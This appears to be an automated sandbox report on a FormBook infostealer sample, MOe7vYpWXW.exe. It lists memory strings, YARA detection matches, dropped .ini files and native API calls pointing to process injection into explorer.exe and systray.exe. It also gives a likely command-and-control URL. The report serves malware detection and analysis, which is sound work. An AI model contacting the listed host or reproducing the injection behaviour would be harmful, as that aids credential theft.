63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
Source: MOe7vYpWXW.exe, 00000000.00000003.655557665.0000000005CAE000.00000004.00000001.sdmp String found in binary or memory: http://en.wE
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: MOe7vYpWXW.exe, 00000000.00000002.681775952.0000000002AD1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000000.688041437.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: MOe7vYpWXW.exe, 00000000.00000003.658793084.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/type
Source: MOe7vYpWXW.exe, 00000000.00000003.658532563.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: MOe7vYpWXW.exe, 00000000.00000003.658532563.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlY$
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: MOe7vYpWXW.exe String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: MOe7vYpWXW.exe String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: MOe7vYpWXW.exe, 00000000.00000003.660901162.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: MOe7vYpWXW.exe, 00000000.00000003.661860989.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: MOe7vYpWXW.exe, 00000000.00000003.661860989.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html8
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, MOe7vYpWXW.exe, 00000000.00000003.661495721.0000000005CAC000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: MOe7vYpWXW.exe, 00000000.00000003.661547983.0000000005CB4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html_
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: MOe7vYpWXW.exe, 00000000.00000002.681628939.0000000000F60000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.come
Source: MOe7vYpWXW.exe, 00000000.00000002.681628939.0000000000F60000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.come.com~
Source: MOe7vYpWXW.exe, 00000000.00000003.655513311.0000000005CBB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: MOe7vYpWXW.exe, 00000000.00000003.655616979.0000000005CBB000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comic
Source: MOe7vYpWXW.exe, 00000000.00000003.655531558.0000000005CBB000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comnv
Source: MOe7vYpWXW.exe, 00000000.00000003.656993902.0000000005CAF000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: MOe7vYpWXW.exe, 00000000.00000003.663713569.0000000005CAC000.00000004.00000001.sdmp, MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: MOe7vYpWXW.exe, 00000000.00000003.663713569.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm)%
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: MOe7vYpWXW.exe, 00000000.00000003.656696292.0000000005CB0000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.krl
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: MOe7vYpWXW.exe, 00000000.00000003.665488221.0000000005CD5000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: systray.exe, 0000000D.00000002.921143445.0000000004D09000.00000004.00000001.sdmp String found in binary or memory: http://www.riandmoara.com
Source: systray.exe, 0000000D.00000002.921143445.0000000004D09000.00000004.00000001.sdmp String found in binary or memory: http://www.riandmoara.com/op9s/
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: MOe7vYpWXW.exe, 00000000.00000003.658532563.0000000005CAC000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: MOe7vYpWXW.exe, 00000000.00000003.658532563.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.comnl
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: MOe7vYpWXW.exe, 00000000.00000003.656696292.0000000005CB0000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.krF
Source: MOe7vYpWXW.exe, 00000000.00000003.656696292.0000000005CB0000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.krn-u
Source: MOe7vYpWXW.exe, 00000000.00000003.656668720.0000000005CAF000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.krn-uF
Source: MOe7vYpWXW.exe, 00000000.00000003.657256425.0000000005CA3000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.
Source: explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: MOe7vYpWXW.exe, 00000000.00000003.655831588.0000000005CBB000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com1
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: MOe7vYpWXW.exe, 00000000.00000003.662433282.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: MOe7vYpWXW.exe, 00000000.00000003.662433282.0000000005CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.delaru
Source: MOe7vYpWXW.exe, 00000000.00000002.695021587.0000000006EB2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.710562746.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: MOe7vYpWXW.exe, 00000000.00000003.657441121.0000000005CA3000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: MOe7vYpWXW.exe, 00000000.00000002.681851207.0000000002B4C000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\systray.exe Dropped file: C:\Users\user\AppData\Roaming\2N30OA8F\2N3logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\systray.exe Dropped file: C:\Users\user\AppData\Roaming\2N30OA8F\2N3logrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041A050 NtClose, 6_2_0041A050
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041A100 NtAllocateVirtualMemory, 6_2_0041A100
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00419F20 NtCreateFile, 6_2_00419F20
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00419FD0 NtReadFile, 6_2_00419FD0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00419EDB NtCreateFile, 6_2_00419EDB
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00419F72 NtReadFile, 6_2_00419F72
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00419F1A NtCreateFile, 6_2_00419F1A
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00419FCA NtReadFile, 6_2_00419FCA
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_01449910
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014499A0 NtCreateSection,LdrInitializeThunk, 6_2_014499A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449840 NtDelayExecution,LdrInitializeThunk, 6_2_01449840
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_01449860
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014498F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_014498F0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449A50 NtCreateFile,LdrInitializeThunk, 6_2_01449A50
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_01449A00
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449A20 NtResumeThread,LdrInitializeThunk, 6_2_01449A20
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449540 NtReadFile,LdrInitializeThunk, 6_2_01449540
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014495D0 NtClose,LdrInitializeThunk, 6_2_014495D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449710 NtQueryInformationToken,LdrInitializeThunk, 6_2_01449710
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449780 NtMapViewOfSection,LdrInitializeThunk, 6_2_01449780
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014497A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_014497A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_01449660
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014496E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_014496E0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449950 NtQueueApcThread, 6_2_01449950
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014499D0 NtCreateProcessEx, 6_2_014499D0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0144B040 NtSuspendThread, 6_2_0144B040
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449820 NtEnumerateKey, 6_2_01449820
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014498A0 NtWriteVirtualMemory, 6_2_014498A0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449B00 NtSetValueKey, 6_2_01449B00
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0144A3B0 NtGetContextThread, 6_2_0144A3B0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449A10 NtQuerySection, 6_2_01449A10
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449A80 NtOpenDirectoryObject, 6_2_01449A80
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449560 NtWriteFile, 6_2_01449560
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449520 NtWaitForSingleObject, 6_2_01449520
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0144AD30 NtSetContextThread, 6_2_0144AD30
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014495F0 NtQueryInformationFile, 6_2_014495F0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449760 NtOpenProcess, 6_2_01449760
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0144A770 NtOpenThread, 6_2_0144A770
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449770 NtSetInformationFile, 6_2_01449770
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0144A710 NtOpenProcessToken, 6_2_0144A710
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449730 NtQueryVirtualMemory, 6_2_01449730
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449FE0 NtCreateMutant, 6_2_01449FE0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449650 NtQueryValueKey, 6_2_01449650
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449670 NtQueryInformationProcess, 6_2_01449670
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_01449610 NtEnumerateValueKey, 6_2_01449610
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_014496D0 NtCreateKey, 6_2_014496D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9560 NtWriteFile,LdrInitializeThunk, 13_2_046C9560
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9540 NtReadFile,LdrInitializeThunk, 13_2_046C9540
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C95D0 NtClose,LdrInitializeThunk, 13_2_046C95D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9660 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_046C9660
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9650 NtQueryValueKey,LdrInitializeThunk, 13_2_046C9650
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9610 NtEnumerateValueKey,LdrInitializeThunk, 13_2_046C9610
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C96E0 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_046C96E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C96D0 NtCreateKey,LdrInitializeThunk, 13_2_046C96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9770 NtSetInformationFile,LdrInitializeThunk, 13_2_046C9770
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9710 NtQueryInformationToken,LdrInitializeThunk, 13_2_046C9710
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9FE0 NtCreateMutant,LdrInitializeThunk, 13_2_046C9FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9780 NtMapViewOfSection,LdrInitializeThunk, 13_2_046C9780
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9860 NtQuerySystemInformation,LdrInitializeThunk, 13_2_046C9860
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9840 NtDelayExecution,LdrInitializeThunk, 13_2_046C9840
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_046C9910
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C99A0 NtCreateSection,LdrInitializeThunk, 13_2_046C99A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9A50 NtCreateFile,LdrInitializeThunk, 13_2_046C9A50
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9520 NtWaitForSingleObject, 13_2_046C9520
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046CAD30 NtSetContextThread, 13_2_046CAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C95F0 NtQueryInformationFile, 13_2_046C95F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9670 NtQueryInformationProcess, 13_2_046C9670
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9760 NtOpenProcess, 13_2_046C9760
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046CA770 NtOpenThread, 13_2_046CA770
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9730 NtQueryVirtualMemory, 13_2_046C9730
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046CA710 NtOpenProcessToken, 13_2_046CA710
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C97A0 NtUnmapViewOfSection, 13_2_046C97A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046CB040 NtSuspendThread, 13_2_046CB040
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9820 NtEnumerateKey, 13_2_046C9820
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C98F0 NtReadVirtualMemory, 13_2_046C98F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C98A0 NtWriteVirtualMemory, 13_2_046C98A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9950 NtQueueApcThread, 13_2_046C9950
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C99D0 NtCreateProcessEx, 13_2_046C99D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9A20 NtResumeThread, 13_2_046C9A20
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9A00 NtProtectVirtualMemory, 13_2_046C9A00
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9A10 NtQuerySection, 13_2_046C9A10
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9A80 NtOpenDirectoryObject, 13_2_046C9A80
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C9B00 NtSetValueKey, 13_2_046C9B00
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046CA3B0 NtGetContextThread, 13_2_046CA3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FA050 NtClose, 13_2_006FA050
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006FA100 NtAllocateVirtualMemory, 13_2_006FA100
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F9F20 NtCreateFile, 13_2_006F9F20
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F9FD0 NtReadFile, 13_2_006F9FD0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F9EDB NtCreateFile, 13_2_006F9EDB
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F9F72 NtReadFile, 13_2_006F9F72
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F9F1A NtCreateFile, 13_2_006F9F1A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_006F9FCA NtReadFile, 13_2_006F9FCA
Detected potential crypto function
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_02AAB264 0_2_02AAB264
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_02AAC2B0 0_2_02AAC2B0
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_02AAB258 0_2_02AAB258
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_02AA9990 0_2_02AA9990
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_02AADF72 0_2_02AADF72
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_050D7B3C 0_2_050D7B3C
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 0_2_050DA2C8 0_2_050DA2C8
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 5_2_001054D9 5_2_001054D9
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D828 6_2_0041D828
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D169 6_2_0041D169
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D176 6_2_0041D176
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D258 6_2_0041D258
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 6_2_0041D3FA 6_2_0041D3FA
